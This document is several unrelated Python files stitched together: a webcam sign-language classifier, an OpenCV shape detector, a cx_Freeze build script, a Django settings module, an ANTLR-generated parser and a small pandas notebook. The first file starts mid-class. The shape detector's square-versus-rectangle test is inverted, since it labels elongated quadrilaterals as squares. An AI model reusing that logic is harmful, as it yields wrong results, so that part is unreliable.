SecondCriterion = '' TCriteria = 0, TStatistics = 0 Differs = False def __init__(self,FirstCriterion,SecondCriterion,TCriteria,TStatistics,Differs): self.FirstCriterion = FirstCriterion self.SecondCriterion = SecondCriterion self.TCriteria = TCriteria self.TStatistics = TStatistics self.Differs = Differs<reponame>prakhar897/ISLR import pickle import string import cv2 from sklearn.cluster import MiniBatchKMeans from preprocessing_surf import cluster_features from surf_image_processing import func with open('./classifiers.model', 'rb') as models_file: models = pickle.load(models_file) symbols = list(string.ascii_uppercase) symbols.extend(['del', 'nothing', 'space']) clf = models['svm'] cap = cv2.VideoCapture(0) while(True): ret, img = cap.read() img = cv2.flip(img, 1) cv2.imshow("original",img) axis_length = min(img.shape[0], img.shape[1]) diff = abs(img.shape[1] - img.shape[0]) if img.shape[0] < img.shape[1]: new_img = img[:, diff//2:img.shape[1]-diff//2] else: new_img = img[diff//2:img.shape[0]-diff//2, :] resized_img = cv2.resize(new_img, (200, 200)) image_data = cv2.imencode('.jpg', resized_img)[1].tostring() with open('input.jpg', 'wb') as image_file: image_file.write(image_data) img_des = func(resized_img) try: X, cluster_model = cluster_features([img_des], range(1), MiniBatchKMeans(n_clusters=150)) #print(cluster_model) y_pred = clf.predict(X) print("\n\nPredicted symbol:") print(symbols[int(y_pred)]) except ValueError: print("less features") if cv2.waitKey(2500) == ord('q'): break # Following line should... 
<-- This should work fine now cv2.destroyAllWindows() cv2.VideoCapture(0).release() <reponame>Aanal2901/Autumn-of-Automation # -*- coding: utf-8 -*- """ Created on Thu Jul 23 13:51:37 2020 @author: <NAME> """ import cv2 import numpy as np img = cv2.imread("C://Users//<NAME>//Downloads//shape.png") img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) ret, img_thresh = cv2.threshold(img_gray, 230, 255, cv2.THRESH_BINARY) #threshold value based on my image cv2.imshow("threshold", img_thresh) contours, _ = cv2.findContours(img_thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) for cnt in contours: if cv2.contourArea(cnt)>4000: #print(cv2.contourArea(cnt)) approx = cv2.approxPolyDP(cnt, 0.01*cv2.arcLength(cnt, True), closed = True) #print(len(approx)) M = cv2.moments(cnt) cx = int(M['m10']/M['m00']) cy = int(M['m01']/M['m00']) org = (cx, cy) font = cv2.FONT_HERSHEY_SIMPLEX # fontScale fontScale = 1 # Blue color in BGR color = (255, 0, 0) # Line thickness of 2 px thickness = 2 if len(approx) == 3: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'triangle', org, font, fontScale, color, thickness, cv2.LINE_AA) elif len(approx) >= 16: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'circle', org, font, fontScale, color, thickness, cv2.LINE_AA) elif len(approx)>=10: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'ellipse', org, font, fontScale, color, thickness, cv2.LINE_AA) elif len(approx)==5: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'pentagon', org, font, fontScale, color, thickness, cv2.LINE_AA) elif len(approx) == 4: (x, y, w, h) = cv2.boundingRect(approx) if w/float(h)>=1.05: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'square', org, font, fontScale, color, thickness, cv2.LINE_AA) else: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'rectangle', org, font, fontScale, color, thickness, cv2.LINE_AA) cv2.imshow("contour", img) cv2.waitKey(1000000) cv2.destroyAllWindows()# -*- coding: utf-8 -*- # # Copyright © 2014 <NAME> # Licensed under the terms of the MIT License """Create a stand-alone executable""" try: from guidata.disthelpers import Distribution except ImportError: raise ImportError, "This script requires guidata 1.4+" import spyderlib import git as git import base import appdirs Info = git.Repo() def create_executable(): """Build executable using ``guidata.disthelpers``""" dist = Distribution() dist.setup(name="LM ratio", version="0.2", description=u"A gui for computing LM ratio", script="gui_LMratio.py", target_name="LMratio.exe") dist.add_data_file('dat') dist.add_data_file('lm_ratiorc.txt') dist.add_modules('guidata') dist.add_modules('guiqwt') dist.add_matplotlib() dist.includes += ['scipy.sparse.csgraph._validation'] dist.includes += ['scipy.sparse.linalg.dsolve.umfpack'] dist.excludes += ['IPython'] # Building executable dist.build('cx_Freeze', cleanup=True) if __name__ == '__main__': create_executable() from django.utils.translation import ugettext_lazy as _ from mayan.apps.smart_settings.classes import SettingNamespace from .literals import ( DEFAULT_METADATA_AVAILABLE_PARSERS, DEFAULT_METADATA_AVAILABLE_VALIDATORS ) namespace = SettingNamespace(label=_('Metadata'), name='metadata') setting_available_parsers = namespace.add_setting( default=DEFAULT_METADATA_AVAILABLE_PARSERS, global_name='METADATA_AVAILABLE_PARSERS' ) setting_available_validators = namespace.add_setting( default=DEFAULT_METADATA_AVAILABLE_VALIDATORS, global_name='METADATA_AVAILABLE_VALIDATORS' ) 
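# (aside on the contour-based shape classifier above) A 4-vertex contour is commonly
# split into "square" vs "rectangle" by how close its bounding-box aspect ratio is to 1.
# A minimal sketch of that check; the 0.95-1.05 band is a conventional choice, not taken
# from the code above:
import cv2

def classify_quad(approx):
    x, y, w, h = cv2.boundingRect(approx)     # axis-aligned bounding box of the contour
    aspect = w / float(h)
    return 'square' if 0.95 <= aspect <= 1.05 else 'rectangle'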
<filename>jeml/engine/jemlParser.py # Generated from jeml.g4 by ANTLR 4.7.1 # encoding: utf-8 from antlr4 import * from io import StringIO from typing.io import TextIO import sys def serializedATN(): with StringIO() as buf: buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3\24") buf.write("q\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7\4\b") buf.write("\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16\t") buf.write("\16\4\17\t\17\4\20\t\20\4\21\t\21\3\2\6\2$\n\2\r\2\16") buf.write("\2%\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\5\3\61\n\3\3\4") buf.write("\3\4\5\4\65\n\4\3\4\3\4\7\49\n\4\f\4\16\4<\13\4\3\5\3") buf.write("\5\3\5\3\6\3\6\3\7\3\7\3\7\3\7\5\7G\n\7\3\b\3\b\3\b\7") buf.write("\bL\n\b\f\b\16\bO\13\b\3\b\3\b\3\b\3\b\5\bU\n\b\3\t\3") buf.write("\t\3\n\3\n\3\13\3\13\3\13\3\13\3\13\5\13`\n\13\3\f\3\f") buf.write("\3\r\3\r\3\16\3\16\3\17\3\17\3\20\3\20\3\21\3\21\3\21") buf.write("\5\21o\n\21\3\21\2\2\22\2\4\6\b\n\f\16\20\22\24\26\30") buf.write("\32\34\36 \2\3\4\2\b\b\17\17\2p\2#\3\2\2\2\4\60\3\2\2") buf.write("\2\6\64\3\2\2\2\b=\3\2\2\2\n@\3\2\2\2\fF\3\2\2\2\16T\3") buf.write("\2\2\2\20V\3\2\2\2\22X\3\2\2\2\24_\3\2\2\2\26a\3\2\2\2") buf.write("\30c\3\2\2\2\32e\3\2\2\2\34g\3\2\2\2\36i\3\2\2\2 n\3\2") buf.write("\2\2\"$\5\4\3\2#\"\3\2\2\2$%\3\2\2\2%#\3\2\2\2%&\3\2\2") buf.write("\2&\3\3\2\2\2\'(\5\n\6\2()\7\3\2\2)*\5\6\4\2*+\7\4\2\2") buf.write("+\61\3\2\2\2,-\5\n\6\2-.\7\3\2\2./\7\4\2\2/\61\3\2\2\2") buf.write("\60\'\3\2\2\2\60,\3\2\2\2\61\5\3\2\2\2\62\65\5\b\5\2\63") buf.write("\65\5\4\3\2\64\62\3\2\2\2\64\63\3\2\2\2\65:\3\2\2\2\66") buf.write("9\5\b\5\2\679\5\4\3\28\66\3\2\2\28\67\3\2\2\29<\3\2\2") buf.write("\2:8\3\2\2\2:;\3\2\2\2;\7\3\2\2\2<:\3\2\2\2=>\5\n\6\2") buf.write(">?\5\f\7\2?\t\3\2\2\2@A\7\16\2\2A\13\3\2\2\2BG\5\22\n") buf.write("\2CG\5\16\b\2DG\5\20\t\2EG\5\24\13\2FB\3\2\2\2FC\3\2\2") buf.write("\2FD\3\2\2\2FE\3\2\2\2G\r\3\2\2\2HI\7\5\2\2IM\5\f\7\2") buf.write("JL\5\f\7\2KJ\3\2\2\2LO\3\2\2\2MK\3\2\2\2MN\3\2\2\2NP\3") buf.write("\2\2\2OM\3\2\2\2PQ\7\6\2\2QU\3\2\2\2RS\7\5\2\2SU\7\6\2") buf.write("\2TH\3\2\2\2TR\3\2\2\2U\17\3\2\2\2VW\t\2\2\2W\21\3\2\2") buf.write("\2XY\7\7\2\2Y\23\3\2\2\2Z`\5\26\f\2[`\5\30\r\2\\`\5\32") buf.write("\16\2]`\5\34\17\2^`\5\36\20\2_Z\3\2\2\2_[\3\2\2\2_\\\3") buf.write("\2\2\2_]\3\2\2\2_^\3\2\2\2`\25\3\2\2\2ab\7\r\2\2b\27\3") buf.write("\2\2\2cd\7\f\2\2d\31\3\2\2\2ef\7\13\2\2f\33\3\2\2\2gh") buf.write("\7\n\2\2h\35\3\2\2\2ij\7\t\2\2j\37\3\2\2\2ko\5\30\r\2") buf.write("lo\5\26\f\2mo\5\32\16\2nk\3\2\2\2nl\3\2\2\2nm\3\2\2\2") buf.write("o!\3\2\2\2\f%\60\648:FMT_n") return buf.getvalue() class jemlParser ( Parser ): grammarFileName = "jeml.g4" atn = ATNDeserializer().deserialize(serializedATN()) decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ] sharedContextCache = PredictionContextCache() literalNames = [ "<INVALID>", "'{'", "'}'", "'['", "']'" ] symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>", "BOOLEAN", "STRING", "INTEGER", "DECIMAL", "HEXIDECIMAL_NUMBER", "BINARY_NUMBER", "OCTAL_NUMBER", "KEY", "MULTILINE_STRING", "EXPONENT", "COMMENT", "MULTILINE_COMMENT", "WS", "NL" ] RULE_document = 0 RULE_j_map = 1 RULE_j_map_body = 2 RULE_j_pair = 3 RULE_j_key = 4 RULE_j_value = 5 RULE_j_list = 6 RULE_j_string = 7 RULE_j_bool = 8 RULE_j_number = 9 RULE_j_octal = 10 RULE_j_binary = 11 RULE_j_hex = 12 RULE_j_decimal = 13 RULE_j_integer = 14 RULE_j_complex = 15 ruleNames = [ "document", "j_map", "j_map_body", "j_pair", "j_key", "j_value", "j_list", "j_string", "j_bool", "j_number", 
"j_octal", "j_binary", "j_hex", "j_decimal", "j_integer", "j_complex" ] EOF = Token.EOF T__0=1 T__1=2 T__2=3 T__3=4 BOOLEAN=5 STRING=6 INTEGER=7 DECIMAL=8 HEXIDECIMAL_NUMBER=9 BINARY_NUMBER=10 OCTAL_NUMBER=11 KEY=12 MULTILINE_STRING=13 EXPONENT=14 COMMENT=15 MULTILINE_COMMENT=16 WS=17 NL=18 def __init__(self, input:TokenStream, output:TextIO = sys.stdout): super().__init__(input, output) self.checkVersion("4.7.1") self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache) self._predicates = None class DocumentContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_map(self, i:int=None): if i is None: return self.getTypedRuleContexts(jemlParser.J_mapContext) else: return self.getTypedRuleContext(jemlParser.J_mapContext,i) def getRuleIndex(self): return jemlParser.RULE_document def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterDocument" ): listener.enterDocument(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitDocument" ): listener.exitDocument(self) def document(self): localctx = jemlParser.DocumentContext(self, self._ctx, self.state) self.enterRule(localctx, 0, self.RULE_document) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 33 self._errHandler.sync(self) _la = self._input.LA(1) while True: self.state = 32 self.j_map() self.state = 35 self._errHandler.sync(self) _la = self._input.LA(1) if not (_la==jemlParser.KEY): break except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_mapContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_key(self): return self.getTypedRuleContext(jemlParser.J_keyContext,0) def j_map_body(self): return self.getTypedRuleContext(jemlParser.J_map_bodyContext,0) def getRuleIndex(self): return jemlParser.RULE_j_map def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_map" ): listener.enterJ_map(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_map" ): listener.exitJ_map(self) def j_map(self): localctx = jemlParser.J_mapContext(self, self._ctx, self.state) self.enterRule(localctx, 2, self.RULE_j_map) try: self.state = 46 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,1,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 37 self.j_key() self.state = 38 self.match(jemlParser.T__0) self.state = 39 self.j_map_body() self.state = 40 self.match(jemlParser.T__1) pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 42 self.j_key() self.state = 43 self.match(jemlParser.T__0) self.state = 44 self.match(jemlParser.T__1) pass except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_map_bodyContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_pair(self, i:int=None): if i is None: return self.getTypedRuleContexts(jemlParser.J_pairContext) else: return self.getTypedRuleContext(jemlParser.J_pairContext,i) def j_map(self, i:int=None): if i is 
None: return self.getTypedRuleContexts(jemlParser.J_mapContext) else: return self.getTypedRuleContext(jemlParser.J_mapContext,i) def getRuleIndex(self): return jemlParser.RULE_j_map_body def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_map_body" ): listener.enterJ_map_body(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_map_body" ): listener.exitJ_map_body(self) def j_map_body(self): localctx = jemlParser.J_map_bodyContext(self, self._ctx, self.state) self.enterRule(localctx, 4, self.RULE_j_map_body) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 50 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,2,self._ctx) if la_ == 1: self.state = 48 self.j_pair() pass elif la_ == 2: self.state = 49 self.j_map() pass self.state = 56 self._errHandler.sync(self) _la = self._input.LA(1) while _la==jemlParser.KEY: self.state = 54 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,3,self._ctx) if la_ == 1: self.state = 52 self.j_pair() pass elif la_ == 2: self.state = 53 self.j_map() pass self.state = 58 self._errHandler.sync(self) _la = self._input.LA(1) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_pairContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_key(self): return self.getTypedRuleContext(jemlParser.J_keyContext,0) def j_value(self): return self.getTypedRuleContext(jemlParser.J_valueContext,0) def getRuleIndex(self): return jemlParser.RULE_j_pair def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_pair" ): listener.enterJ_pair(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_pair" ): listener.exitJ_pair(self) def j_pair(self): localctx = jemlParser.J_pairContext(self, self._ctx, self.state) self.enterRule(localctx, 6, self.RULE_j_pair) try: self.enterOuterAlt(localctx, 1) self.state = 59 self.j_key() self.state = 60 self.j_value() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_keyContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def KEY(self): return self.getToken(jemlParser.KEY, 0) def getRuleIndex(self): return jemlParser.RULE_j_key def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_key" ): listener.enterJ_key(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_key" ): listener.exitJ_key(self) def j_key(self): localctx = jemlParser.J_keyContext(self, self._ctx, self.state) self.enterRule(localctx, 8, self.RULE_j_key) try: self.enterOuterAlt(localctx, 1) self.state = 62 self.match(jemlParser.KEY) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_valueContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_bool(self): return self.getTypedRuleContext(jemlParser.J_boolContext,0) def 
j_list(self): return self.getTypedRuleContext(jemlParser.J_listContext,0) def j_string(self): return self.getTypedRuleContext(jemlParser.J_stringContext,0) def j_number(self): return self.getTypedRuleContext(jemlParser.J_numberContext,0) def getRuleIndex(self): return jemlParser.RULE_j_value def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_value" ): listener.enterJ_value(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_value" ): listener.exitJ_value(self) def j_value(self): localctx = jemlParser.J_valueContext(self, self._ctx, self.state) self.enterRule(localctx, 10, self.RULE_j_value) try: self.state = 68 self._errHandler.sync(self) token = self._input.LA(1) if token in [jemlParser.BOOLEAN]: self.enterOuterAlt(localctx, 1) self.state = 64 self.j_bool() pass elif token in [jemlParser.T__2]: self.enterOuterAlt(localctx, 2) self.state = 65 self.j_list() pass elif token in [jemlParser.STRING, jemlParser.MULTILINE_STRING]: self.enterOuterAlt(localctx, 3) self.state = 66 self.j_string() pass elif token in [jemlParser.INTEGER, jemlParser.DECIMAL, jemlParser.HEXIDECIMAL_NUMBER, jemlParser.BINARY_NUMBER, jemlParser.OCTAL_NUMBER]: self.enterOuterAlt(localctx, 4) self.state = 67 self.j_number() pass else: raise NoViableAltException(self) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_listContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_value(self, i:int=None): if i is None: return self.getTypedRuleContexts(jemlParser.J_valueContext) else: return self.getTypedRuleContext(jemlParser.J_valueContext,i) def getRuleIndex(self): return jemlParser.RULE_j_list def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_list" ): listener.enterJ_list(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_list" ): listener.exitJ_list(self) def j_list(self): localctx = jemlParser.J_listContext(self, self._ctx, self.state) self.enterRule(localctx, 12, self.RULE_j_list) self._la = 0 # Token type try: self.state = 82 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,7,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 70 self.match(jemlParser.T__2) self.state = 71 self.j_value() self.state = 75 self._errHandler.sync(self) _la = self._input.LA(1) while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << jemlParser.T__2) | (1 << jemlParser.BOOLEAN) | (1 << jemlParser.STRING) | (1 << jemlParser.INTEGER) | (1 << jemlParser.DECIMAL) | (1 << jemlParser.HEXIDECIMAL_NUMBER) | (1 << jemlParser.BINARY_NUMBER) | (1 << jemlParser.OCTAL_NUMBER) | (1 << jemlParser.MULTILINE_STRING))) != 0): self.state = 72 self.j_value() self.state = 77 self._errHandler.sync(self) _la = self._input.LA(1) self.state = 78 self.match(jemlParser.T__3) pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 80 self.match(jemlParser.T__2) self.state = 81 self.match(jemlParser.T__3) pass except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_stringContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser 
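# (aside) A minimal driver for this generated parser, sketched in comments so as not to
# interrupt the generated class bodies. ANTLR normally emits a companion lexer from the
# same jeml.g4 grammar (presumably `jemlLexer`; it is not shown in this file, so the
# import below is an assumption):
#
#   from antlr4 import InputStream, CommonTokenStream
#   from jemlLexer import jemlLexer               # assumed companion module
#   lexer = jemlLexer(InputStream(some_jeml_text))  # tokenize the raw text
#   parser = jemlParser(CommonTokenStream(lexer))
#   tree = parser.document()                      # 'document' is the start rule above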
def STRING(self): return self.getToken(jemlParser.STRING, 0) def MULTILINE_STRING(self): return self.getToken(jemlParser.MULTILINE_STRING, 0) def getRuleIndex(self): return jemlParser.RULE_j_string def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_string" ): listener.enterJ_string(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_string" ): listener.exitJ_string(self) def j_string(self): localctx = jemlParser.J_stringContext(self, self._ctx, self.state) self.enterRule(localctx, 14, self.RULE_j_string) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 84 _la = self._input.LA(1) if not(_la==jemlParser.STRING or _la==jemlParser.MULTILINE_STRING): self._errHandler.recoverInline(self) else: self._errHandler.reportMatch(self) self.consume() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_boolContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def BOOLEAN(self): return self.getToken(jemlParser.BOOLEAN, 0) def getRuleIndex(self): return jemlParser.RULE_j_bool def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_bool" ): listener.enterJ_bool(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_bool" ): listener.exitJ_bool(self) def j_bool(self): localctx = jemlParser.J_boolContext(self, self._ctx, self.state) self.enterRule(localctx, 16, self.RULE_j_bool) try: self.enterOuterAlt(localctx, 1) self.state = 86 self.match(jemlParser.BOOLEAN) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_numberContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_octal(self): return self.getTypedRuleContext(jemlParser.J_octalContext,0) def j_binary(self): return self.getTypedRuleContext(jemlParser.J_binaryContext,0) def j_hex(self): return self.getTypedRuleContext(jemlParser.J_hexContext,0) def j_decimal(self): return self.getTypedRuleContext(jemlParser.J_decimalContext,0) def j_integer(self): return self.getTypedRuleContext(jemlParser.J_integerContext,0) def getRuleIndex(self): return jemlParser.RULE_j_number def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_number" ): listener.enterJ_number(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_number" ): listener.exitJ_number(self) def j_number(self): localctx = jemlParser.J_numberContext(self, self._ctx, self.state) self.enterRule(localctx, 18, self.RULE_j_number) try: self.enterOuterAlt(localctx, 1) self.state = 93 self._errHandler.sync(self) token = self._input.LA(1) if token in [jemlParser.OCTAL_NUMBER]: self.state = 88 self.j_octal() pass elif token in [jemlParser.BINARY_NUMBER]: self.state = 89 self.j_binary() pass elif token in [jemlParser.HEXIDECIMAL_NUMBER]: self.state = 90 self.j_hex() pass elif token in [jemlParser.DECIMAL]: self.state = 91 self.j_decimal() pass elif token in [jemlParser.INTEGER]: self.state = 92 self.j_integer() pass else: raise NoViableAltException(self) except RecognitionException as re: localctx.exception = re 
self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_octalContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def OCTAL_NUMBER(self): return self.getToken(jemlParser.OCTAL_NUMBER, 0) def getRuleIndex(self): return jemlParser.RULE_j_octal def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_octal" ): listener.enterJ_octal(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_octal" ): listener.exitJ_octal(self) def j_octal(self): localctx = jemlParser.J_octalContext(self, self._ctx, self.state) self.enterRule(localctx, 20, self.RULE_j_octal) try: self.enterOuterAlt(localctx, 1) self.state = 95 self.match(jemlParser.OCTAL_NUMBER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_binaryContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def BINARY_NUMBER(self): return self.getToken(jemlParser.BINARY_NUMBER, 0) def getRuleIndex(self): return jemlParser.RULE_j_binary def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_binary" ): listener.enterJ_binary(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_binary" ): listener.exitJ_binary(self) def j_binary(self): localctx = jemlParser.J_binaryContext(self, self._ctx, self.state) self.enterRule(localctx, 22, self.RULE_j_binary) try: self.enterOuterAlt(localctx, 1) self.state = 97 self.match(jemlParser.BINARY_NUMBER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_hexContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def HEXIDECIMAL_NUMBER(self): return self.getToken(jemlParser.HEXIDECIMAL_NUMBER, 0) def getRuleIndex(self): return jemlParser.RULE_j_hex def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_hex" ): listener.enterJ_hex(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_hex" ): listener.exitJ_hex(self) def j_hex(self): localctx = jemlParser.J_hexContext(self, self._ctx, self.state) self.enterRule(localctx, 24, self.RULE_j_hex) try: self.enterOuterAlt(localctx, 1) self.state = 99 self.match(jemlParser.HEXIDECIMAL_NUMBER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_decimalContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def DECIMAL(self): return self.getToken(jemlParser.DECIMAL, 0) def getRuleIndex(self): return jemlParser.RULE_j_decimal def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_decimal" ): listener.enterJ_decimal(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_decimal" ): listener.exitJ_decimal(self) def j_decimal(self): localctx = jemlParser.J_decimalContext(self, 
self._ctx, self.state) self.enterRule(localctx, 26, self.RULE_j_decimal) try: self.enterOuterAlt(localctx, 1) self.state = 101 self.match(jemlParser.DECIMAL) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_integerContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def INTEGER(self): return self.getToken(jemlParser.INTEGER, 0) def getRuleIndex(self): return jemlParser.RULE_j_integer def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_integer" ): listener.enterJ_integer(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_integer" ): listener.exitJ_integer(self) def j_integer(self): localctx = jemlParser.J_integerContext(self, self._ctx, self.state) self.enterRule(localctx, 28, self.RULE_j_integer) try: self.enterOuterAlt(localctx, 1) self.state = 103 self.match(jemlParser.INTEGER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_complexContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_binary(self): return self.getTypedRuleContext(jemlParser.J_binaryContext,0) def j_octal(self): return self.getTypedRuleContext(jemlParser.J_octalContext,0) def j_hex(self): return self.getTypedRuleContext(jemlParser.J_hexContext,0) def getRuleIndex(self): return jemlParser.RULE_j_complex def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_complex" ): listener.enterJ_complex(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_complex" ): listener.exitJ_complex(self) def j_complex(self): localctx = jemlParser.J_complexContext(self, self._ctx, self.state) self.enterRule(localctx, 30, self.RULE_j_complex) try: self.state = 108 self._errHandler.sync(self) token = self._input.LA(1) if token in [jemlParser.BINARY_NUMBER]: self.enterOuterAlt(localctx, 1) self.state = 105 self.j_binary() pass elif token in [jemlParser.OCTAL_NUMBER]: self.enterOuterAlt(localctx, 2) self.state = 106 self.j_octal() pass elif token in [jemlParser.HEXIDECIMAL_NUMBER]: self.enterOuterAlt(localctx, 3) self.state = 107 self.j_hex() pass else: raise NoViableAltException(self) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx #!/usr/bin/env python # coding: utf-8 # In[77]: import pandas as pd import matplotlib.pyplot as plt import numpy as np from collections import Counter # In[2]: import sys # get_ipython().system('{sys.executable} -m pip install matplotlib') # In[3]: df = pd.read_csv('/users/apple/Desktop/Data Analysis/data/survey_results_public.csv') # In[4]: coutries = ['Poland'] filt = (df['Country'].isin(coutries)) & (df['ConvertedComp'] > 70000) & df['LanguageWorkedWith'].str.contains('Python', na=False) df.loc[filt, ['Country', 'LanguageWorkedWith', 'ConvertedComp']] # In[ ]: # 